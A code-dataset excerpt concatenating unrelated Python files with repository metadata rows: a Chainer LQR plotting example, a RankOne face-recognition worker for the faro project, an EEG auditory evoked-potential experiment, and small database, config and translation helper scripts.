F =chainer.Variable(np.array([(np.array([[
1.0,0, 0, 1],
[1,1.0,0,0],
[0, 1, 1, 0]])) for i in range(T)])).reshape(T,1,n_state,n_sc,)
c = chainer.Variable(np.array([(np.array([0,0,0.0,0]).T) for i in range(T)])).reshape(T,1,n_sc,)
_C = np.array([np.array([[0,0 ,0,0],[0,0,0,0],[0,0,1.0,0],[0,0,0,1]]) for i in range(T-1)])
_C = np.append(_C , np.array([[0,0 ,0,0],[0,0,0,0],[0,0,1.0,0],[0,0,0,0.00000000000001]]))
C = chainer.Variable(_C).reshape(T,1,n_sc, n_sc)
x_init = chainer.Variable(np.array([0.5428, 0.7633,0.3504])).reshape(1,n_state)
C
test = LqrRecursion(x_init,C,c,F,f,T,n_state,n_ctrl)
Ks, ks = test.backward()
k1 =[]
k2 = []
fig, ax = plt.subplots()
for i in range(T-1):
k1.append(Ks[i][0][0][0].data)
k2.append(Ks[i][0][0][1].data)
major_ticks = np.arange(0,T, 2)
ax.grid(which = "major", axis = "x", color = "blue", alpha = 0.8,
linestyle = "--", linewidth = 1)
ax.grid(which = "major", axis = "y", color = "green", alpha = 0.8,
linestyle = "--", linewidth = 1)
ax.set_xticks(major_ticks)
ax.set_ylim(-0.5, 1.2)
ax.plot(k1)
ax.plot(k2)
ax.set_ylim(-2, 0)
ax.set_xlim(0,T)
x,u = test.solve_recursion()
# +
us = []
for i in range(T):
us.append(x[i][0][0].data)
fig, ax = plt.subplots()
ax.grid(which = "major", axis = "x", color = "blue", alpha = 0.8,
linestyle = "--", linewidth = 1)
# y軸に目盛線を設定
ax.grid(which = "major", axis = "y", color = "green", alpha = 0.8,
linestyle = "--", linewidth = 1)
major_ticks = np.arange(0, 20, 2)
ax.set_xticks(major_ticks)
ax.set_ylim(-2, 1)
ax.set_xlim(0, 20)
ax.plot(us, marker='.')
plt.show()
# -
Ks
Ks
len(Ks)
x
| 23.298969 | 96 | 0.567257 | [
"MIT"
] | msakai/chainer-differentiable-mpc | examples/Boyd_lqr.py | 2,276 | Python |
'''
Created on August 18th 2020
@author: Nisha Srinivas
'''
import faro
import os
import faro.proto.proto_types as pt
import faro.proto.face_service_pb2 as fsd
import numpy as np
import pyvision as pv
import time
from PIL import Image
import json
import faro.proto.geometry_pb2 as geo
from array import array
roc = None
def getOptionsGroup(parser):
rankone_options = parser.add_option_group("Options for RankOne")
rankone_options.add_option("--img-quality", type=float, dest="img_quality",default=None)
rankone_options.add_option("--num-faces", type=int, dest="num_faces", default=None)
rankone_options.add_option("--min-face-size", dest="min_face_size", default='recommended')
class RankOneFaceWorker(faro.FaceWorker):
'''
classdocs
'''
def __init__(self, options):
'''
Constructor
'''
'''
Initialize ROC SDK. looks for the license file and optionally we can provide a log file. If it cannot find the license then it will quit. Roc_ensure catches the error and aborts.
'''
global roc
import roc as _local_roc
roc = _local_roc
if os.environ.get('ROC_LIC') is not None:
roc.roc_ensure(roc.roc_initialize(None,None))
else:
self.license_file = (roc.__file__).split('python')[0] + 'ROC.lic'
roc.roc_ensure(roc.roc_initialize(self.license_file.encode('utf-8'),None))
print("ROC SDK Initialized")
self.img_quality = options.img_quality
self.num_faces = options.num_faces
self.min_face_size = options.min_face_size
self.detection_threshold = self.recommendedDetectionThreshold()
if self.img_quality is None:
self.img_quality = self.recommendedImgQuality()
if self.num_faces is None:
self.num_faces = self.recommendedMaxFacesDetected()
'''
ROC_Frontal : ROC frontal face detector (-30 to +30 degress yaw)
ROC_FR : Represent in-the-wild-faces for comparison
Note : Non-frontal faces detected by ROC_FULL and ROC_PARTIAL are not reliable for recognition.
Therefore we advise against using ROC_FULL or ROC_PARTIAL in conjunction with ROC_FR or ROC_ID.
ROC_FULL : ROC face detector (-100 to +100 degrees yaw)
ROC_DEMOGRAPHICS - Return age, gender, sex
ROC_PITCHYAW - Returns yaw and pitch
'''
self.algorithm_id_detect = roc.ROC_FULL
self.algorithm_id_extract = roc.ROC_MANUAL | roc.ROC_FR | roc.ROC_DEMOGRAPHICS | roc.ROC_LANDMARKS | roc.ROC_PITCHYAW
roc.roc_ensure(roc.roc_preload(self.algorithm_id_detect))
roc.roc_ensure(roc.roc_preload(self.algorithm_id_extract))
def _converttoRocImage(self,imgarray):
#convert to PIL image (This has to be an RGB image)
image_pillow = Image.fromarray(imgarray)
#conver PIL to roc image
image_roc = roc.roc_image()
image_roc.width = image_pillow.width
image_roc.height = image_pillow.height
image_roc.step = 3 * image_pillow.width
image_roc.color_space = roc.ROC_BGR24
bytes = 3 * image_pillow.width * image_pillow.height
image_roc.data = roc.new_uint8_t_array(bytes + 1)
roc.memmove(image_roc.data, image_pillow.tobytes())
#RankOne requires a BGR image
roc.roc_ensure(roc.roc_swap_channels(image_roc))
return image_roc
def _rocFlatten(self,tmpl):
'''
Converts roc template to serialized data.
Datatype = bytes
'''
buffer_size = roc.new_size_t()
#calculates the bytes required to a template
roc.roc_flattened_bytes(tmpl, buffer_size)
buffer_size_int = roc.size_t_value(buffer_size)
roc_buffer_src = roc.new_uint8_t_array(buffer_size_int)
roc.roc_flatten(tmpl, roc_buffer_src)
native_buffer = roc.cdata(roc_buffer_src, buffer_size_int)
roc.delete_size_t(buffer_size)
roc.delete_uint8_t_array(roc_buffer_src)
return native_buffer
def _rocUnFlatten(self, buff, template_dst):
'''
Converts serialized data back to roc template.
'''
#template_dst = roc.roc_template()
roc_buffer_dst = roc.new_uint8_t_array(len(buff) + 1)
roc.memmove(roc_buffer_dst, buff)
roc.roc_unflatten(roc_buffer_dst, template_dst)
roc.delete_uint8_t_array(roc_buffer_dst)
return template_dst
def _detect(self,im, opts):
'''
In RankOne, face detection happends within the roc_represent function.
There is no explicit face detection step like in dlib.
But we will output the bounding box. but it is not really useful in this case.
'''
'''
Rank one requires the image to be of type roc_image. Hence
we will check for the image type. In this case it is a numpy array (skimage imread).
Check if the image is a numpy array and if it is then conver it to a PIL image and
then to a roc_image. The reason I am doing this is cause rankone provides example code
to convert from PIL image to roc_image.
'''
h,w,_ = im.shape
if isinstance(im,np.ndarray):
im = self._converttoRocImage(im)
'''
indicates the smalled face to detect
Face detection size is measured by the width of the face in pixels.
The default value is 36. It roughly correspinds to 18 pixels between the eyes.
'''
if self.min_face_size == 'recommended':
self.min_face_size = self.recommendedMinFaceSize()
elif self.min_face_size == 'adaptive_size':
'''
A method for determining the minimum face detection size as a fraction of the image size.
In the interest of efficiency, it is recommended to set a lower bound on the minimum face detection size as a fraction of the image size. Given a relative minimum size of 4% of the image dimensions, and an absolute minimum size of 36 pixels, the adaptive minimum size is: max(max(image.width, image.height) * 0.04, 36).
Example
roc_image image = ...;
size_t adaptive_minimum_size;
roc_adaptive_minimum_size(image, 0.04, 36, &adaptive_minimum_size);
'''
adaptive_minimum_size = new_size_t()
roc_ensure(roc_adaptive_minimum_size(im, 0.04, 36, adaptive_minimum_size))
else:
self.min_face_size = int(self.min_face_size)
self.detection_threshold = opts.threshold
if opts.best:
self.num_faces = 1
#create a template array
templates = roc.new_roc_template_array(self.num_faces)
if self.min_face_size != 'adaptive_size':
roc.roc_represent(im, self.algorithm_id_detect, self.min_face_size, self.num_faces, self.detection_threshold, self.img_quality, templates)
else:
roc.roc_represent(im, self.algorithm_id_detect, size_t_value(adaptive_minimum_size), self.num_faces, detection_threshold, self.img_quality, templates)
roc.delete_size_t(adaptive_minimum_size)
# we don't need to check for best mode here. If a failed detection occurs then
#create a template by manually specifying the bounding box
# fix the missing detection case
curr_template = roc.roc_template_array_getitem(templates, 0)
if (curr_template.algorithm_id == 0 or curr_template.algorithm_id & roc.ROC_INVALID):
curr_template = roc.roc_template_array_getitem(templates, 0)
curr_template.detection.x = int(w * 0.5)
curr_template.detection.y = int(h * 0.5)
curr_template.detection.width = w
curr_template.detection.height = h
roc.roc_template_array_setitem(templates,0,curr_template)
roc.roc_represent(im, roc.ROC_MANUAL, self.min_face_size, 1, self.detection_threshold, self.img_quality, templates)
roc.roc_free_image(im)
return templates
def detect(self,img,face_records,options):
detected_templates = self._detect(img,options)
for i in range(0,self.num_faces):
curr_template = roc.roc_template_array_getitem(detected_templates, i)
if curr_template.algorithm_id & roc.ROC_INVALID or curr_template.algorithm_id == 0:
continue
else:
face_record = face_records.face_records.add()
face_record.detection.score = curr_template.detection.confidence
xc, yc, w, h = curr_template.detection.x, curr_template.detection.y, curr_template.detection.width, curr_template.detection.height
x = int(xc - (w*0.5))
y = int(yc - (w*0.5))
face_record.detection.location.CopyFrom(pt.rect_val2proto(x, y, w, h))
face_record.detection.detection_id = i
face_record.detection.detection_class = "FACE"
face_record.template.buffer = self._rocFlatten(curr_template)
#Free all the roc stuff
for i in range(0,self.num_faces):
roc.roc_free_template(roc.roc_template_array_getitem(detected_templates,i))
def extract(self, img, face_records):
if isinstance(img,np.ndarray):
im = self._converttoRocImage(img)
for face_record in face_records.face_records:
template_dst = roc.roc_template()
self._rocUnFlatten(face_record.template.buffer, template_dst)
roc.roc_represent(im, self.algorithm_id_extract, self.recommendedMinFaceSize(), 1, self.recommendedDetectionThreshold(), self.recommendedImgQuality(), template_dst)
if template_dst.algorithm_id & roc.ROC_INVALID or template_dst.algorithm_id == 0:
continue
else:
xc, yc, w, h = template_dst.detection.x, template_dst.detection.y, template_dst.detection.width, template_dst.detection.height
x = int(xc - (w*0.5))
y = int(yc - (w*0.5))
assert (face_record.detection.location.x == x), "They have to be equal cause"
assert (face_record.detection.location.y == y), "They have to be equal cause"
assert (face_record.detection.location.width == w), "They have to be equal cause"
assert (face_record.detection.location.height == h), "They have to be equal cause"
'''
default metadata fields : ChinX,ChinY, IOD (inter-occular distance), LeftEyeX, LeftEyeY, NoseRootX,
NoseRootY, Path, Pose, Quality, RightEyeX, RightEyeY, Roll
'''
metadata_info = json.loads(template_dst.md.decode('utf-8'))
landmark = face_record.landmarks.add()
landmark.landmark_id = 'Nose'
landmark.location.x = metadata_info['NoseRootX']
landmark.location.y = metadata_info['NoseRootY']
landmark = face_record.landmarks.add()
landmark.landmark_id = 'LeftEye'
landmark.location.x = metadata_info['LeftEyeX']
landmark.location.y = metadata_info['LeftEyeY']
landmark = face_record.landmarks.add()
landmark.landmark_id = 'RightEye'
landmark.location.x = metadata_info['RightEyeX']
landmark.location.y = metadata_info['RightEyeY']
landmark = face_record.landmarks.add()
landmark.landmark_id = 'ChinX'
landmark.location.x = metadata_info['ChinX']
landmark.location.y = metadata_info['ChinY']
demographic = face_record.attributes.add()
demographic.key = 'Age'
demographic.text = str(metadata_info['Age'])
demographic = face_record.attributes.add()
demographic.key = 'Gender'
demographic.text = metadata_info['Gender']
demographic = face_record.attributes.add()
demographic.key = 'GeographicOrigin'
demographic.text = metadata_info['GeographicOrigin']
demographic = face_record.attributes.add()
demographic.key = 'Emotion'
demographic.text = metadata_info['Emotion']
demographic = face_record.attributes.add()
demographic.key = 'Artwork'
demographic.text = metadata_info['Artwork']
demographic = face_record.attributes.add()
demographic.key = 'Yaw'
demographic.text = str(metadata_info['Yaw'])
face_record.template.buffer = self._rocFlatten(template_dst)
roc.roc_ensure(roc.roc_free_template(template_dst))
def locate(self,img,face_records,options):
'''
Not needed as we find the location of the eyes, nose and chin during detection and have
added it to face records during detection
'''
pass
def align(self,image,face_records):
'''Align the images to a standard size and orientation to allow
recognition.'''
pass # Not needed for this algorithm.
def scoreType(self):
'''Return the method used to create a score from the template.
By default server computation is required.
SCORE_L1, SCORE_L2, SCORE_DOT, SCORE_SERVER
'''
return fsd.SERVER
def score(self,score_request):
'''Compare templates to produce scores.'''
score_type = self.scoreType()
result = geo.Matrix()
# Check that this is a known score type
if score_type not in [fsd.SERVER]:
raise NotImplementedError("Score type <%s> not implemented."%(score_type,))
# Check to make sure the probe and gallery records are correct
if len(score_request.template_probes.templates) == 0:
raise ValueError("no probe templates were found in the arguments.")
if len(score_request.template_gallery.templates) == 0:
raise ValueError("no gallery templates were found in the arguments.")
#THIS IS NOT NECESSAY AS WE ARE ALWAYS COPYING THE TEMPLATES AND NOT USING FACE RECORD -> REFER TO
#FUNCTION in FaceClient.py
'''
if min(len(score_request.face_probes.face_records),len(score_request.template_probes.templates)) != 0:
raise ValueError("probes argument cannot have both face_probes and template_probes defined.")
if max(len(score_request.face_probes.face_records),len(score_request.template_probes.templates)) == 0:
raise ValueError("no probe templates were found in the arguments.")
if min(len(score_request.face_gallery.face_records),len(score_request.template_gallery.templates)) != 0:
raise ValueError("gallery argument cannot have both face_gallery and template_gallery defined.")
if max(len(score_request.face_gallery.face_records),len(score_request.template_gallery.templates)) == 0:
raise ValueError("no gallery templates were found in the arguments.")
'''
#This is the first attempt at computing similarity scores. This is definitely not the fastest approach.
#Also , this is going to be restricted by memory. The whole similarity matrix be be held in memory.
#So for large datasets this might pose a problem
if score_type == fsd.SERVER:
#rows = probe images
#cols = gallery images
sim_mat = np.zeros((len(score_request.template_probes.templates),len(score_request.template_gallery.templates)),dtype=np.float32)
roc_probe_template = roc.roc_template()
roc_gallery_template = roc.roc_template()
#roc_gallery_template_array = roc.new_roc_template_array(len(score_request.template_gallery.templates))
sm_metric = roc.new_roc_similarity()
for p in range(0,len(score_request.template_probes.templates)):
self._rocUnFlatten(score_request.template_probes.templates[p].buffer,roc_probe_template)
#print roc_probe_template
for g in range(0,len(score_request.template_gallery.templates)):
#print(p,g)
#if p == 0:
# roc_gallery_template = roc.roc_template()
# self._rocUnFlatten(score_request.template_gallery.templates[g].buffer,roc_gallery_template)
# roc.roc_template_array_setitem(roc_gallery_template_array,g,roc_gallery_template)
#roc_gallery_template = roc.roc_template()
self._rocUnFlatten(score_request.template_gallery.templates[g].buffer,roc_gallery_template)
#roc.roc_compare_templates(roc_probe_template, roc.roc_template_array_getitem(roc_gallery_template_array,g), sm_metric)
roc.roc_compare_templates(roc_probe_template, roc_gallery_template, sm_metric)
sim_mat[p,g] = roc.roc_similarity_value(sm_metric)
#roc.roc_free_template(roc_gallery_template)
roc.delete_roc_similarity(sm_metric)
roc.roc_free_template(roc_probe_template)
roc.roc_free_template(roc_gallery_template)
#for i in range(len(score_request.template_gallery.templates)):
#print(i)
# roc.roc_ensure(roc.roc_free_template(roc.roc_template_array_getitem(roc_gallery_template_array, i)))
else:
NotImplementedError("ScoreType %s is not implemented."%(score_type,))
#RankOne returns a similarity score of -1 if it compares with an invalid template
#Threfore find all -1's in the matrix and replace it with a 0
sim_mat[sim_mat == -1.0] = 0.0
#converting the simialrity matrix to distance matrix by subtracting with 1
dist_mat = 1.0 - sim_mat
# Return the result
return pt.matrix_np2proto(dist_mat)
def status(self):
'''Return a simple status message.'''
print("Handeling status request.")
status_message = fsd.FaceServiceInfo()
status_message.status = fsd.READY
status_message.detection_support = True
status_message.extract_support = True
status_message.score_support = False
status_message.score_type = self.scoreType()
status_message.algorithm = "RankOne_%s"%(roc.__file__);
status_message.detection_threshold = self.recommendedDetectionThreshold()
status_message.match_threshold = self.recommendedScoreThreshold()
return status_message
def recommendedImgQuality(self):
return roc.ROC_SUGGESTED_MIN_QUALITY
def recommendedDetectionThreshold(self):
'''
The false_detection_rate parameter specifies the allowable
false positive rate for face detection.The suggested default
value for false_detection_rate is 0.02 which corresponds to
one false detection in 50 images on the FDDB benchmark. A
higher false detection rate will correctly detect more faces
at the cost of also incorrectly detecting more non-faces.
The accepted range of values for false_detection_rate is
between 0 to 1. Values outside this range will be modified
to be at the aforementioned bounds automatically.
'''
return 0.02
def recommendedMaxFacesDetected(self):
return 10
def recommendedMinFaceSize(self):
return 32
def recommendedScoreThreshold(self,far=-1):
'''Return the method used to create a score from the template.
By default server computation is required.
Should return a recommended score threshold.
DLIB recommends a value of 0.6 for LFW dataset
'''
return 0.60
def cleanexit(self):
print('ROC SDK Deinitialized')
roc.roc_finalize()
| 44.027897 | 331 | 0.640347 | [
"MIT"
] | ORNL/faro | src/faro/face_workers/RankOneFaceWorker.py | 20,517 | Python |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from locales import Locales
print("content-type:text/html\n\n")
locales_obj = Locales('en')
print(locales_obj.get_missing_translations())
| 18.8 | 45 | 0.723404 | [
"MIT"
] | letztes/achtelbass2web | get_missing_translations.py | 188 | Python |
"""
Generate Steady-State Auditory Evoked Potential (SSAEP)
=======================================================
Steady-State Auditory Evoked Potential (SSAEP) - also known as Auditory
Steady-State Response (ASSR) - stimulus presentation.
"""
from time import time
import numpy as np
from pandas import DataFrame
from psychopy import visual, core, event, sound
from scipy import stats
__title__ = "Auditory SSAEP (orig)"
def present(
save_fn: str,
duration=120,
n_trials=2010,
iti=0.5,
soa=3.0,
jitter=0.2,
volume=0.8,
random_state=42,
eeg=None,
cf1=900,
amf1=45,
cf2=770,
amf2=40.018,
sample_rate=44100,
):
"""
Auditory SSAEP Experiment
===========================
Parameters:
-----------
duration - duration of the recording in seconds (default 10)
n_trials - number of trials (default 10)
iti - intertrial interval (default 0.3)
soa - stimulus onset asynchrony, = interval between end of stimulus
and next trial (default 0.2)
jitter - jitter in the intertrial intervals (default 0.2)
secs - duration of the sound in seconds (default 0.2)
volume - volume of the sounds in [0,1] (default 0.8)
random_state - random seed (default 42)
"""
# Set up trial parameters
np.random.seed(random_state)
markernames = [1, 2]
record_duration = np.float32(duration)
# Initialize stimuli
am1 = generate_am_waveform(cf1, amf1, secs=soa, sample_rate=sample_rate)
am2 = generate_am_waveform(cf2, amf2, secs=soa, sample_rate=sample_rate)
aud1 = sound.Sound(am1, sampleRate=sample_rate)
aud1.setVolume(volume)
aud2 = sound.Sound(am2, sampleRate=sample_rate)
aud2.setVolume(volume)
auds = [aud1, aud2]
# Set up trial list
stim_freq = np.random.binomial(1, 0.5, n_trials)
itis = iti + np.random.rand(n_trials) * jitter
trials = DataFrame(dict(stim_freq=stim_freq, timestamp=np.zeros(n_trials)))
trials["iti"] = itis
trials["soa"] = soa
# Setup graphics
mywin = visual.Window(
[1920, 1080], monitor="testMonitor", units="deg", fullscr=True
)
fixation = visual.GratingStim(win=mywin, size=0.2, pos=[0, 0], sf=0, rgb=[1, 0, 0])
fixation.setAutoDraw(True)
mywin.flip()
# Show the instructions screen
show_instructions(10)
# Start EEG Stream, wait for signal to settle, and then pull timestamp for start point
if eeg:
eeg.start(save_fn, duration=record_duration)
start = time()
# Iterate through the events
for ii, trial in trials.iterrows():
# Intertrial interval
core.wait(trial["iti"] + np.random.randn() * jitter)
# Select stimulus frequency
ind = trials["stim_freq"].iloc[ii]
auds[ind].stop()
auds[ind].play()
# Push sample
if eeg:
timestamp = time()
if eeg.backend == "muselsl":
marker = [markernames[ind]]
marker = list(map(int, marker))
else:
marker = markernames[ind]
eeg.push_sample(marker=marker, timestamp=timestamp)
mywin.flip()
# Offset
core.wait(soa)
if len(event.getKeys()) > 0:
break
if (time() - start) > record_duration:
break
event.clearEvents()
# Cleanup
if eeg:
eeg.stop()
mywin.close()
def show_instructions(duration):
instruction_text = """
Welcome to the aMMN experiment!
Stay still, focus on the centre of the screen, and try not to blink.
This block will run for %s seconds.
Press spacebar to continue.
"""
instruction_text = instruction_text % duration
# graphics
mywin = visual.Window([1600, 900], monitor="testMonitor", units="deg", fullscr=True)
mywin.mouseVisible = False
# Instructions
text = visual.TextStim(win=mywin, text=instruction_text, color=[-1, -1, -1])
text.draw()
mywin.flip()
event.waitKeys(keyList="space")
mywin.mouseVisible = True
mywin.close()
def generate_am_waveform(
carrier_freq,
am_freq,
secs=1,
sample_rate=None,
am_type="gaussian",
gaussian_std_ratio=8,
):
"""Generate an amplitude-modulated waveform.
Generate a sine wave amplitude-modulated by a second sine wave or a
Gaussian envelope with standard deviation = period_AM/8.
Args:
carrier_freq (float): carrier wave frequency, in Hz
am_freq (float): amplitude modulation frequency, in Hz
Keyword Args:
secs (float): duration of the stimulus, in seconds
sample_rate (float): sampling rate of the sound, in Hz
am_type (str): amplitude-modulation type
'gaussian' -> Gaussian with std defined by `gaussian_std`
'sine' -> sine wave
gaussian_std_ratio (float): only used if `am_type` is 'gaussian'.
Ratio between AM period and std of the Gaussian envelope. E.g.,
gaussian_std = 8 means the Gaussian window has 8 standard
deviations around its mean inside one AM period.
Returns:
(numpy.ndarray): sound samples
"""
t = np.arange(0, secs, 1.0 / sample_rate)
if am_type == "gaussian":
period = int(sample_rate / am_freq)
std = period / gaussian_std_ratio
norm_window = stats.norm.pdf(np.arange(period), period / 2, std)
norm_window /= np.max(norm_window)
n_windows = int(np.ceil(secs * am_freq))
am = np.tile(norm_window, n_windows)
am = am[: len(t)]
elif am_type == "sine":
am = np.sin(2 * np.pi * am_freq * t)
carrier = 0.5 * np.sin(2 * np.pi * carrier_freq * t) + 0.5
am_out = carrier * am
return am_out
| 25.923767 | 90 | 0.619962 | [
"BSD-3-Clause"
] | Neuroelektroteknia/eeg-notebooks | eegnb/experiments/auditory_ssaep/ssaep.py | 5,781 | Python |
import sqlalchemy
from databases import Database
DATABASE_URL = "sqlite:///sampleSQlite.db"
database = Database(DATABASE_URL)
sqlalchemy_engine = sqlalchemy.create_engine(DATABASE_URL)
def get_database() -> Database:
return database
| 21.818182 | 58 | 0.8 | [
"MIT"
] | spideynolove/Other-repo | backend/fastapi/build_dsApp/Databases/sqlalchemy/database.py | 240 | Python |
import os
from ml_serving import Config as ServingConfig
class ClusteringConfig(ServingConfig):
min_cluster_size: int
cosine_thrsh: float
def __init__(self, **kwargs):
super().__init__()
for arg, dtype in self.__class__.__annotations__.items():
if arg in kwargs:
setattr(self, arg, dtype(kwargs[arg]))
else:
setattr(self, arg, dtype(os.environ[arg.upper()])) | 31.714286 | 66 | 0.630631 | [
"MIT"
] | gasparian/ml-serving-template | producers/short-texts-clustering/src/clustering/config.py | 444 | Python |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.